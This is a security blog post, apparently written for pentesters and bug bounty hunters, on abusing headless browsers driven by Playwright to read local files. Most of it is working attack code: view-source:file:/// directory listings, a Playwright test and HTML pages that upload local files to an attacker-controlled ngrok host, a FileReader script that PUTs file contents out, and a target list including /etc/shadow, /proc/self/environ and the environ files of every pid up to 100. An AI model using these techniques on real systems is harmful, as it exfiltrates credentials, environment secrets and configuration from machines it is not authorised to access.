Arbitrary file read tricks with headless browsers


Last time we set up a test environment to play around with Playwright. This time I would like to walk through a few challenges you hit when pushing arbitrary file reads (through file://) with headless browsers: an empty screen instead of a directory listing, and files being downloaded instead of shown.

Although I’m using Playwright, it is only one example; it could just as well be Selenium, Puppeteer or any other framework that tests apps with headless browsers.

I’m gonna give you each symptom and the solutions I found (if you have any thoughts on how to improve them, please don’t hold back), considering two threat vectors:

an attacker being able to only control the page to be loaded
an attacker being able to control the whole playwright test script (rare, but happens)

So in the previous post you’ve seen how headless Chromium (and actually Chrome) gives an empty screen for file:///. I have to admit that in the heat of a bug bounty I didn’t realize that this was not due to some sophisticated configuration / input validation, and that it could simply be resolved by using view-source:file:///.

Directory listing visible on Chromium with view-source

If input sanitization on the target app is messed up, this can work even when you only control the page to be loaded by playwright. And to be honest when input sanitization allows the file:/// protocol to be used, it most likely will allow view-source:file:/// as well ;)
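As a minimal sketch of that trick: the helper below (toViewSource is a made-up name, not part of Playwright) only prefixes file: URLs with view-source: and leaves everything else alone. The commented usage assumes a Playwright test like the ones later in this post; the screenshot path is a placeholder.

```typescript
// Hypothetical helper: wrap a file: URL in view-source: so that Chromium
// shows the directory listing as text instead of an empty page.
function toViewSource(url: string): string {
  if (url.startsWith('view-source:')) {
    return url; // already wrapped, do not prefix twice
  }
  return url.startsWith('file:') ? `view-source:${url}` : url;
}

// Possible usage inside a Playwright test (paths are placeholders):
//   await page.goto(toViewSource('file:///'));
//   await page.screenshot({ path: 'test-results/listing.png', fullPage: true });
```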

So when I wanted to get a specific configuration file (let’s call it config.yml) on Chrome, I bumped into an empty screenshot again (both when accessing it directly and through view-source). Although I should’ve thought about it immediately, I again needed a few extra local clicks in my browser to realize that Chrome (and for that matter Firefox too) will not render YAML files by default but will “download” them when opened through file://. OK, so what can we do?

With control over only the page loaded by playwright, I couldn’t find a decent way to overcome this obstacle. With control over the test specification, however, I get access to almost all the things a browser can do, including opening a page with a file upload function.

Remote file upload

My first quick & dirty approach was to have a form with a filepicker served through ngrok & python, open that page, pick that config.yml with playwright’s help and submit the form.

The HTML is super simple:

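<!-- note: target names a browsing context, not a URL, so submitting opens a popup and POSTs to this page's own URL -->
<form method="post" enctype="multipart/form-data" target="/exfiltrate">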
<div>
<label for="file">Choose file to upload</label>
<input type="file" id="file" name="file" class="filepicker" multiple />
</div>
<div>
<button id="bttn" class="bttn">Submit</button>
</div>
</form>

Let’s have something quickly to serve it (no, don’t put anything else into that folder and shut down things as soon as you don’t need them):

ngrok http 8000
python3 -m http.server 8000

And the Playwright test doing the actual file upload:

import { test, expect } from '@playwright/test';

// files to read from the machine running the browser
const paths: string[] = ['/root/config.yaml'];
// of course replace the below with your ngrok domain name
const NGROK_DOMAIN: string = 'https://edac-12-111-3-75.eu.ngrok.io';

test("arbitrary file read", async ({ page }) => {
  for (const path of paths) {
    await page.goto(NGROK_DOMAIN + '/js-fileread.html');
    await page.locator('input[name="file"]').click();
    await page.locator('input[name="file"]').setInputFiles(path);
    await page.screenshot({ path: 'test-results/' + path.replace(/\//gi, "_") + '.png', fullPage: true });
    // submitting the form opens a popup, so wait for it together with the click
    await Promise.all([
      page.waitForEvent('popup'),
      page.locator('text=Submit').click()
    ]);
  }
});

In this case the screenshots are not too useful (one shows the upload page and the other a 501 error response, as the python http.server doesn’t handle POST requests right now), but in ngrok’s web UI we can see that the contents of the file were indeed sent to us:

Contents of a local YAML file finally visible

Awesome, so now we should be able to “scrape” the local file system by extending paths in the playwright test specification. To get a general sense of the system I highly recommend gathering all the neat things mentioned in https://idafchev.github.io/enumeration/2018/03/05/linux_proc_enum.html (and more target specific files).

However there are some “files” that can’t be properly retrieved with this super simple html upload due to their content… for example trying to retrieve /proc/net/tcp will leave us with the following error message in the ngrok web UI:

The connection was closed before this request could be fully read; 0 bytes were captured. It cannot be replayed. The error encountered while reading the request body was “unexpected EOF”.

Using FileReader only

OK… do we really need that POST for every file? It is handy… especially when the other end is not just a stupid ngrok, but actually gathers the files nicely organized based on any additional metadata available. BUT we can also simply use FileReader to actually read the files as text and write them to the DOM (or send them off to ourselves to store & organize it nicely… but that might be a different post about scaling this whole thing up).

So let’s call Stack Overflow to the rescue and create a different version for this approach (js-fileread.html):

<html>
<head>
<script>
  window.onload = function(event) {
    document.getElementById('fileInput').addEventListener('change', handleFileSelect, false);
  }

  function handleFileSelect(event) {
    var fileReader = new FileReader();
    fileReader.onload = function(event) {
      document.write(event.target.result);
    }
    var file = event.target.files[0];
    fileReader.readAsText(file);
  }
</script>
</head>
<body>
  <input type="file" name="file" id="fileInput">
</body>
</html>

And a minor tweak on the playwright test itself (no need to actually submit anything):

import { test, expect } from '@playwright/test';

const paths: string[] = ['/proc/net/tcp'];
const NGROK_DOMAIN: string = 'https://edac-12-111-3-75.eu.ngrok.io';

test("arbitrary file read", async ({ page }) => {
  for (const path of paths) {
    await page.goto(NGROK_DOMAIN + '/js-fileread.html');
    await page.locator('input[name="file"]').click();
    await page.locator('input[name="file"]').setInputFiles(path);
    await page.screenshot({ path: 'test-results/' + path.replace(/\//gi, "_") + '.png', fullPage: true });
  }
});

And here comes /proc/net/tcp as well
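The raw /proc/net/tcp output is not pleasant to read: addresses are hex encoded, and state 0A marks a listening socket. Here is a rough sketch of how the retrieved text could be decoded. The function names are mine, it handles IPv4 only, and it assumes the target is a little-endian machine (typical for x86 and ARM), where the address bytes appear reversed.

```typescript
// Decode one address field such as "0100007F:1F90" into "127.0.0.1:8080".
// Assumes IPv4 on a little-endian host, hence the byte reversal.
function decodeProcNetAddr(field: string): string {
  const [ipHex, portHex] = field.split(':');
  const octets = (ipHex.match(/../g) ?? [])
    .map((hexByte) => parseInt(hexByte, 16))
    .reverse();
  return `${octets.join('.')}:${parseInt(portHex, 16)}`;
}

// Return the local addresses of all sockets in state 0A (LISTEN).
function listeningSockets(raw: string): string[] {
  return raw
    .split('\n')
    .slice(1) // skip the header line
    .map((line) => line.trim().split(/\s+/))
    .filter((fields) => fields.length > 3 && fields[3] === '0A')
    .map((fields) => decodeProcNetAddr(fields[1]));
}
```

Feeding it the text that ended up in the screenshot (or in the DOM) gives a quick list of services bound on the box, which is usually the first thing I want from that file.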

As I said, I personally prefer not to get that data as screenshots, so this is what I ended up with for handling the file selection:

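function handleFileSelect(event) {
  var file = event.target.files[0];
  var fileReader = new FileReader();
  fileReader.onload = function(event) {
    const xhr = new XMLHttpRequest();
    // encode the name so special characters cannot break the request path
    xhr.open('PUT', '/file/' + encodeURIComponent(file.name), true);
    xhr.onload = () => {};
    xhr.send(event.target.result);
  }
  // fine for text files; readAsArrayBuffer is the safer choice for binary content
  fileReader.readAsBinaryString(file);
}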

And I removed creating the screenshots from the test spec.

File name and content both nicely visible
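If you would rather not depend on the ngrok web UI, the receiving end can be a tiny Node server. What follows is only a sketch under my own assumptions: the loot directory, the lootName helper and startReceiver are made-up names, the server replaces python's http.server (so it also has to serve js-fileread.html from the current directory), and it accepts only the PUT /file/<name> requests sent by the handler above.

```typescript
import * as http from 'node:http';
import * as fs from 'node:fs';
import * as path from 'node:path';

// Hypothetical output directory for the collected files.
const LOOT_DIR = 'loot';

// Map a request path like "/file/config.yaml" to a flat, safe file name.
// Returns null for anything that is not under /file/.
function lootName(urlPath: string): string | null {
  const prefix = '/file/';
  if (!urlPath.startsWith(prefix)) return null;
  let name: string;
  try {
    name = decodeURIComponent(urlPath.slice(prefix.length));
  } catch {
    return null; // malformed percent-encoding
  }
  // Replace path separators and odd characters, and never start with a dot.
  const flat = name.replace(/[^A-Za-z0-9._-]/g, '_').replace(/^\.+/, '_');
  return flat.length > 0 ? flat : null;
}

// Start the receiver: GET serves the upload page, PUT stores a file.
function startReceiver(port: number): http.Server {
  fs.mkdirSync(LOOT_DIR, { recursive: true });
  const server = http.createServer((req, res) => {
    if (req.method === 'GET' && req.url === '/js-fileread.html') {
      res.writeHead(200, { 'Content-Type': 'text/html' });
      res.end(fs.readFileSync('js-fileread.html'));
      return;
    }
    const name = req.method === 'PUT' ? lootName(req.url ?? '') : null;
    if (name === null) {
      res.writeHead(404);
      res.end();
      return;
    }
    const chunks: Buffer[] = [];
    req.on('data', (chunk: Buffer) => chunks.push(chunk));
    req.on('end', () => {
      fs.writeFileSync(path.join(LOOT_DIR, name), Buffer.concat(chunks));
      res.writeHead(204);
      res.end();
    });
  });
  return server.listen(port);
}
```

Calling startReceiver(8000) and pointing ngrok at port 8000 would keep the rest of the setup unchanged. The name flattening is there because the server sits on the public internet for a while, and you don't want anybody writing outside of that folder.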

Of course there are a ton of ways to further improve this whole thing:

let’s actually multiselect those files all at once
have that backend writing the files to disk for investigation nicely with all the additional info (map the full path based on the filename / set extra info from playwright to have the full path by default)
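Both ideas run into the same detail: the page only ever sees file.name, which is the basename, so /proc/1/cmdline and /proc/2/cmdline would look identical on the receiving end. One possible way around it, sketched below with made-up helper names, is to split the path list into batches in which every basename is unique. Each batch can then be handed to setInputFiles as an array and mapped back to full paths without ambiguity.

```typescript
// Group full paths by the only thing the page sees: the basename.
function groupByBasename(paths: string[]): Map<string, string[]> {
  const groups = new Map<string, string[]>();
  for (const fullPath of paths) {
    const base = fullPath.slice(fullPath.lastIndexOf('/') + 1);
    const group = groups.get(base) ?? [];
    group.push(fullPath);
    groups.set(base, group);
  }
  return groups;
}

// Split paths into batches where no basename appears twice.
function uniqueBatches(paths: string[]): string[][] {
  const batches: string[][] = [];
  groupByBasename(paths).forEach((group) => {
    group.forEach((fullPath, index) => {
      if (!batches[index]) batches[index] = [];
      batches[index].push(fullPath);
    });
  });
  return batches;
}

// Possible usage inside the test (assumes the file input carries the
// `multiple` attribute and the page handler loops over all selected files):
//   for (const batch of uniqueBatches(paths)) {
//     await page.goto(NGROK_DOMAIN + '/js-fileread.html');
//     await page.locator('input[name="file"]').setInputFiles(batch);
//   }
```

As far as I know Playwright refuses several files on an input without the multiple attribute, so the FileReader page would need that attribute added before this works.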

OK, so now we have a decent way to retrieve multiple files reliably. What should you get by default?

I would go with something like this:

let paths: string[] = [
'/proc/net/arp', '/proc/net/route', '/proc/net/tcp', '/proc/self/cmdline',
'/proc/self/comm', '/proc/self/environ', '/proc/mounts',
'/proc/uptime', '/etc/fstab', '/etc/passwd', '/etc/shadow', '/etc/hosts',
'/etc/hostname', '/etc/resolv.conf'
]

And to do a bit of recon on the running processes (bruteforcing the first 100 pids, but ofc you could increase it way more…):

// pids start at 1, there is no /proc/0
for (let pid = 1; pid <= 100; pid++) {
  paths.push('/proc/' + pid + '/cmdline')
  paths.push('/proc/' + pid + '/environ')
}
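Two practical notes on this, sketched below with helper names of my own. First, most of those pids will not exist, and as far as I know setInputFiles fails on a missing file, so each read is better wrapped in try/catch rather than letting the first gap kill the whole run. Second, cmdline and environ are NUL-separated, so the raw text needs splitting before it is readable.

```typescript
// Build the list of /proc/<pid>/<entry> paths for pids 1..maxPid.
function procPaths(maxPid: number, entries: string[] = ['cmdline', 'environ']): string[] {
  const result: string[] = [];
  for (let pid = 1; pid <= maxPid; pid++) {
    for (const entry of entries) {
      result.push(`/proc/${pid}/${entry}`);
    }
  }
  return result;
}

// Split the NUL-separated content of /proc/<pid>/cmdline into arguments.
function splitNul(raw: string): string[] {
  return raw.split('\0').filter((part) => part.length > 0);
}

// Turn the content of /proc/<pid>/environ into a key/value object.
function parseEnviron(raw: string): Record<string, string> {
  const env: Record<string, string> = {};
  for (const entry of splitNul(raw)) {
    const eq = entry.indexOf('=');
    if (eq > 0) {
      env[entry.slice(0, eq)] = entry.slice(eq + 1);
    }
  }
  return env;
}

// Possible usage inside the test loop (skips pids that do not exist):
//   try {
//     await page.locator('input[name="file"]').setInputFiles(path);
//   } catch (error) {
//     continue;
//   }
```

Environment variables are where credentials and internal hostnames tend to show up, so having environ as a proper object makes grepping through a hundred processes a lot less painful.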

And this would really be just the first step, giving some ideas about the environment… I would also create a short Playwright test to gather the directory listing recursively on the whole disk (maybe next time?).

And then the most important part: understand the target by thoroughly analyzing the results and looking for anything that might actually contain sensitive information (duh).

As you can see, it is absolutely no rocket science to read files when you have a chance to play around with playwright / puppeteer, but there are a few issues that need a bit of care, and automating all the above can significantly increase your speed on pentests / bug bounties.
